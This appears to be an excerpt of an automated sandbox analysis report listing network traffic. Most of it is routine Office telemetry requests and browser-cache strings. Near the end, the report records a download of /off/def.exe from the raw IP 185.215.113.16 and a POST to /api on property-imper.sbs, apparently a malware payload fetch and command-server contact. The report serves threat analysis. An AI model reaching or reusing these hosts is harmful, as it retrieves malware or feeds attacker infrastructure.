        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
        Source: chromecache_92.12.dr, chromecache_104.12.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
        Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
        Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
